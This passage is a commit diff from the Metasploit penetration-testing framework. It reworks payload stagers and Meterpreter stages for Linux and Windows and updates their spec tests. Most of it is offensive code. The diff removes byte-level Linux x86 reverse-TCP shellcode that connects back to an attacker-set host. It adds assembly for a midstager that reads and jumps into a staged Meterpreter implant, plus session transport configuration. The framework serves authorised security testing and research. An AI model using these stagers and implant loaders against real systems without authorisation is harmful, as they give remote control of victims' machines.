arch: ARCH_X64
)
end
# create the configuration block
config_opts = {
arch: opts[:uuid].arch,
exitfunk: datastore['EXITFUNC'],
expiration: datastore['SessionExpirationTimeout'].to_i,
uuid: opts[:uuid],
transports: [transport_config_reverse_tcp(opts)],
extensions: (datastore['EXTENSIONS'] || '').split(',')
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

4
modules/payloads/stagers/linux/x86/bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/core/payload/linux/bind_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 110
include Msf::Payload::Stager
include Msf::Payload::Linux::BindTcp
@ -19,7 +19,7 @@ module Metasploit4
super(merge_info(info,
'Name' => 'Bind TCP Stager (Linux x86)',
'Description' => 'Listen for a connection (Linux x86)',
'Author' => [ 'skape', 'egypt', ],
'Author' => [ 'skape', 'egypt' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,

82
modules/payloads/stagers/linux/x86/reverse_tcp.rb
View File

@ -6,83 +6,25 @@
require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/linux/reverse_tcp'
module Metasploit4
###
#
# ReverseTcp
# ----------
#
# Linux reverse TCP stager.
#
###
module Metasploit3
CachedSize = 71
CachedSize = 193
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Linux::ReverseTcp
def initialize(info = {})
super(merge_info(info,
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => [
'skape', # original
'egypt', # NX support
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Stager' =>
{
'Offsets' =>
{
'LHOST' => [ 0x12, 'ADDR' ],
'LPORT' => [ 0x19, 'n' ],
},
'Payload' =>
"\x31\xdb" +# xor ebx,ebx
"\xf7\xe3" +# mul ebx
"\x53" +# push ebx
"\x43" +# inc ebx
"\x53" +# push ebx
"\x6a\x02" +# push byte +0x2
"\xb0\x66" +# mov al,0x66
"\x89\xe1" +# mov ecx,esp
"\xcd\x80" +# int 0x80
"\x97" +# xchg eax,edi
"\x5b" +# pop ebx
"\x68\x7f\x00\x00\x01" +# push dword 0x100007f
"\x68\x02\x00\xbf\xbf" +# push dword 0xbfbf0002
"\x89\xe1" +# mov ecx,esp
"\x6a\x66" +# push byte +0x66
"\x58" +# pop eax
"\x50" +# push eax
"\x51" +# push ecx
"\x57" +# push edi
"\x89\xe1" +# mov ecx,esp
"\x43" +# inc ebx
"\xcd\x80" +# int 0x80
"\xb2\x07" +# mov dl,0x7
"\xb9\x00\x10\x00\x00" +# mov ecx,0x1000
"\x89\xe3" +# mov ebx,esp
"\xc1\xeb\x0c" +# shr ebx,0xc
"\xc1\xe3\x0c" +# shl ebx,0xc
"\xb0\x7d" +# mov al,0x7d
"\xcd\x80" +# int 0x80
"\x5b" +# pop ebx
"\x89\xe1" +# mov ecx,esp
"\x99" +# cdq
"\xb6\x0c" +# mov dh,0xc
"\xb0\x03" +# mov al,0x3
"\xcd\x80" +# int 0x80
"\xff\xe1" # jmp ecx
}
))
'Name' => 'Reverse TCP Stager',
'Description' => 'Connect back to the attacker',
'Author' => [ 'skape', 'egypt' ],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::ReverseTcp,
'Stager' => { 'Payload' => '' }))
end
end

2
modules/payloads/stagers/windows/bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/core/payload/windows/bind_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 285
include Msf::Payload::Stager
include Msf::Payload::Windows::BindTcp

2
modules/payloads/stagers/windows/reverse_winhttp.rb
View File

@ -11,7 +11,7 @@ require 'msf/core/payload/windows/reverse_winhttp'
module Metasploit3
CachedSize = 327
CachedSize = 329
include Msf::Payload::Stager
include Msf::Payload::Windows

2
modules/payloads/stagers/windows/reverse_winhttps.rb
View File

@ -11,7 +11,7 @@ require 'msf/core/payload/windows/reverse_winhttps'
module Metasploit3
CachedSize = 347
CachedSize = 349
include Msf::Payload::Stager
include Msf::Payload::Windows

2
modules/payloads/stagers/windows/x64/bind_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/core/payload/windows/x64/bind_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 479
include Msf::Payload::Stager
include Msf::Payload::Windows::BindTcp_x64

9
modules/payloads/stagers/windows/x64/reverse_https.rb
View File

@ -5,12 +5,14 @@
require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/handler/reverse_https'
module Metasploit3
CachedSize = 578
include Msf::Payload::TransportConfig
include Msf::Payload::Stager
include Msf::Payload::Windows
@ -91,6 +93,13 @@ module Metasploit3
))
end
#
# Generate the transport-specific configuration
#
def transport_config(opts={})
transport_config_reverse_https(opts)
end
#
# Do not transmit the stage over the connection. We handle this via HTTPS
#

2
modules/payloads/stagers/windows/x64/reverse_tcp.rb
View File

@ -10,7 +10,7 @@ require 'msf/core/payload/windows/x64/reverse_tcp'
module Metasploit4
CachedSize = :dynamic
CachedSize = 437
include Msf::Payload::Stager
include Msf::Payload::Windows::ReverseTcp_x64

129
modules/payloads/stages/linux/x86/meterpreter.rb
View File

@ -8,17 +8,14 @@ require 'msf/base/sessions/meterpreter_x86_linux'
require 'msf/base/sessions/meterpreter_options'
require 'rex/elfparsey'
# Provides methods to patch options into the metsrv stager.
require 'rex/payloads/meterpreter/patch'
module Metasploit3
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Meterpreter',
'Description' => 'Staged meterpreter server',
'Author' => ['PKS', 'egypt'],
'Description' => 'Inject the meterpreter server payload (staged)',
'Author' => ['PKS', 'egypt', 'OJ Reeves'],
'Platform' => 'linux',
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
@ -35,6 +32,7 @@ module Metasploit3
return ep
end
=begin
def elf2bin(payload)
# XXX, not working. Use .c version
@ -64,31 +62,76 @@ module Metasploit3
print_status("Converted ELF file to memory layout, #{payload.length} to #{used} bytes")
return mem[0, used]
end
=end
def handle_intermediate_stage(conn, payload)
# Does a mmap() / read() loop of a user specified length, then
# jumps to the entry point (the \x5a's)
entry_offset = elf_ep(payload)
config_offset = payload.length - generate_meterpreter.length
midstager = "\x81\xc4\x54\xf2\xff\xff" # fix up esp
midstager <<
"\x6a\x04\x5a\x89\xe1\x89\xfb\x6a\x03\x58" +
"\xcd\x80\x57\xb8\xc0\x00\x00\x00\xbb\x00\x00\x04\x20\x8b\x4c\x24" +
"\x04\x6a\x07\x5a\x6a\x32\x5e\x31\xff\x89\xfd\x4f\xcd\x80\x3d\x7f" +
"\xff\xff\xff\x72\x05\x31\xc0\x40\xcd\x80\x87\xd1\x87\xd9\x5b\x6a" +
"\x03\x58\xcd\x80\x3d\x7f\xff\xff\xff\x77\xea\x85\xc0\x74\xe6\x01" +
"\xc1\x29\xc2\x75\xea\x6a\x59\x53\xb8\x5a\x5a\x5a\x5a\xff\xd0\xe9" +
"\xd1\xff\xff\xff"
# Patch in debug options
midstager = midstager.sub("Y", [ datastore['DebugOptions'] ].pack('C'))
# Patch entry point
midstager = midstager.sub("ZZZZ", [ elf_ep(payload) ].pack('V'))
encoded_entry = "0x%.8x" % entry_offset
encoded_offset = "0x%.8x" % config_offset
encoded_debug_options = "0x%.2x" % datastore['DebugOptions'].to_i
# Maybe in the future patch in base.
# Does a mmap() / read() loop of a user specified length, then
# jumps to the entry point (the \x5a's)
midstager_asm = %Q^
midstager:
and esp, 0xFFFFF254
push 0x4
pop edx
mov ecx, esp
mov ebx, edi
push 0x3
pop eax
int 0x80
push edi
mov eax, 0xC0
mov ebx, 0x20040000
mov ecx, dword ptr [esp+0x4]
push 0x7
pop edx
push 0x32
pop esi
xor edi, edi
mov ebp, edi
dec edi
int 0x80
cmp eax, 0xFFFFFF7F
jb start_read
terminate:
xor eax, eax
inc eax
int 0x80 ; sys_exit
start_read:
xchg ecx, edx
xchg ecx, ebx
pop ebx
read_loop:
push 0x3
pop eax
int 0x80 ; sys_read
cmp eax, 0xFFFFFF7F
ja terminate ; exit on error
test eax, eax
je terminate ; exit on error
add ecx, eax
sub edx, eax
jne read_loop ; read more
; edx should be at the end, but we need to adjust for the size of the config
; block so we know where to write the socket to memory
sub ecx, #{encoded_offset}
mov [ecx], ebx ; write the socket to the config
push #{encoded_debug_options}
push ecx ; pass in the configuration pointer
mov eax, #{encoded_entry} ; put the entry point in eax
call eax
jmp terminate
^
midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string
print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)")
conn.put(midstager)
Rex::ThreadSafe.sleep(1.5)
@ -100,14 +143,40 @@ module Metasploit3
end
def generate_stage
blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
meterpreter = generate_meterpreter
config = generate_config
meterpreter + config
end
Rex::Payloads::Meterpreter::Patch.patch_timeouts!(blob,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:comm_timeout => datastore['SessionCommunicationTimeout'].to_i,
:retry_total => datastore['SessionRetryTotal'].to_i,
:retry_wait => datastore['SessionRetryWait'].to_i)
def generate_meterpreter
blob = MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
blob
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new({
:platform => 'linux',
:arch => ARCH_X86
})
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
:arch => opts[:uuid].arch,
:exitfunk => nil,
:expiration => datastore['SessionExpirationTimeout'].to_i,
:uuid => opts[:uuid],
:transports => [transport_config(opts)],
:extensions => [],
:ascii_str => true
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

41
modules/payloads/stages/windows/meterpreter.rb
View File

@ -5,19 +5,21 @@
require 'msf/core'
require 'msf/core/payload/windows/reflectivedllinject'
require 'msf/core/payload/windows/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x86_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
###
#
# Injects the meterpreter server DLL via the Reflective Dll Injection payload
# along with transport related configuration.
#
###
module Metasploit3
module Metasploit4
include Msf::Payload::Windows::ReflectiveDllInject
include Msf::Payload::Windows::MeterpreterLoader
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
@ -28,14 +30,35 @@ module Metasploit3
'PayloadCompat' => { 'Convention' => 'sockedi', },
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x86_Win))
# Don't let people set the library name option
options.remove_option('LibraryName')
options.remove_option('DLL')
end
def library_path
MetasploitPayloads.meterpreter_path('metsrv','x86.dll')
def stage_payload(opts={})
stage_meterpreter + generate_config(opts)
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new({
:platform => 'windows',
:arch => ARCH_X86
})
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
:arch => opts[:uuid].arch,
:exitfunk => datastore['EXITFUNC'],
:expiration => datastore['SessionExpirationTimeout'].to_i,
:uuid => opts[:uuid],
:transports => [transport_config(opts)],
:extensions => []
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

43
modules/payloads/stages/windows/x64/meterpreter.rb
View File

@ -5,37 +5,60 @@
require 'msf/core'
require 'msf/core/payload/windows/x64/reflectivedllinject'
require 'msf/core/payload/windows/x64/meterpreter_loader'
require 'msf/base/sessions/meterpreter_x64_win'
require 'msf/base/sessions/meterpreter_options'
require 'rex/payloads/meterpreter/config'
###
#
# Injects the x64 meterpreter server DLL via the Reflective Dll Injection payload
# along with transport related configuration.
#
###
module Metasploit3
module Metasploit4
include Msf::Payload::Windows::ReflectiveDllInject_x64
include Msf::Payload::Windows::MeterpreterLoader_x64
include Msf::Sessions::MeterpreterOptions
def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Meterpreter (Reflective Injection x64)',
'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64)',
'Author' => [ 'sf' ],
'Author' => ['skape','sf', 'OJ Reeves'],
'PayloadCompat' => { 'Convention' => 'sockrdi', },
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x64_Win))
# Don't let people set the library name option
options.remove_option('LibraryName')
options.remove_option('DLL')
end
def library_path
MetasploitPayloads.meterpreter_path('metsrv','x64.dll')
def stage_payload(opts={})
stage_meterpreter + generate_config(opts)
end
def generate_config(opts={})
unless opts[:uuid]
opts[:uuid] = Msf::Payload::UUID.new({
:platform => 'windows',
:arch => ARCH_X64
})
end
# create the configuration block, which for staged connections is really simple.
config_opts = {
:arch => opts[:uuid].arch,
:exitfunk => datastore['EXITFUNC'],
:expiration => datastore['SessionExpirationTimeout'].to_i,
:uuid => opts[:uuid],
:transports => [transport_config(opts)],
:extensions => []
}
# create the configuration instance based off the parameters
config = Rex::Payloads::Meterpreter::Config.new(config_opts)
# return the binary version of it
config.to_b
end
end

50
spec/modules/payloads_spec.rb
View File

@ -1348,7 +1348,7 @@ describe 'modules/payloads', :content do
'stagers/linux/x86/bind_tcp',
'stages/linux/x86/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/x86/meterpreter/bind_tcp'
end
@ -1455,7 +1455,7 @@ describe 'modules/payloads', :content do
'stagers/linux/x86/bind_tcp',
'stages/linux/x86/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'linux/x86/shell/bind_tcp'
end
@ -2285,7 +2285,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/dllinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/dllinject/bind_tcp'
end
@ -2498,7 +2498,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_bind_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_bind_tcp'
end
@ -2508,7 +2508,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_http'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_http'
end
@ -2518,7 +2518,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_https'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_https'
end
@ -2528,7 +2528,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_ipv6_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_ipv6_tcp'
end
@ -2538,7 +2538,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/meterpreter_reverse_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter_reverse_tcp'
end
@ -2571,7 +2571,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/meterpreter/bind_tcp'
end
@ -2789,7 +2789,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/patchupdllinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/patchupdllinject/bind_tcp'
end
@ -2932,7 +2932,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/patchupmeterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/patchupmeterpreter/bind_tcp'
end
@ -3075,7 +3075,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/shell/bind_tcp'
end
@ -3268,7 +3268,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/upexec'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/upexec/bind_tcp'
end
@ -3411,7 +3411,7 @@ describe 'modules/payloads', :content do
'stagers/windows/bind_tcp',
'stages/windows/vncinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/vncinject/bind_tcp'
end
@ -3552,7 +3552,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/bind_tcp',
'stages/windows/x64/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter/bind_tcp'
end
@ -3574,7 +3574,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/reverse_tcp',
'stages/windows/x64/meterpreter'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter/reverse_tcp'
end
@ -3584,7 +3584,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_bind_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_bind_tcp'
end
@ -3594,7 +3594,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_http'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_http'
end
@ -3604,7 +3604,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_https'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_https'
end
@ -3614,7 +3614,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_ipv6_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_ipv6_tcp'
end
@ -3624,7 +3624,7 @@ describe 'modules/payloads', :content do
ancestor_reference_names: [
'singles/windows/x64/meterpreter_reverse_tcp'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/meterpreter_reverse_tcp'
end
@ -3635,7 +3635,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/bind_tcp',
'stages/windows/x64/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/shell/bind_tcp'
end
@ -3646,7 +3646,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/reverse_tcp',
'stages/windows/x64/shell'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/shell/reverse_tcp'
end
@ -3677,7 +3677,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/bind_tcp',
'stages/windows/x64/vncinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/vncinject/bind_tcp'
end
@ -3688,7 +3688,7 @@ describe 'modules/payloads', :content do
'stagers/windows/x64/reverse_tcp',
'stages/windows/x64/vncinject'
],
dynamic_size: true,
dynamic_size: false,
modules_pathname: modules_pathname,
reference_name: 'windows/x64/vncinject/reverse_tcp'
end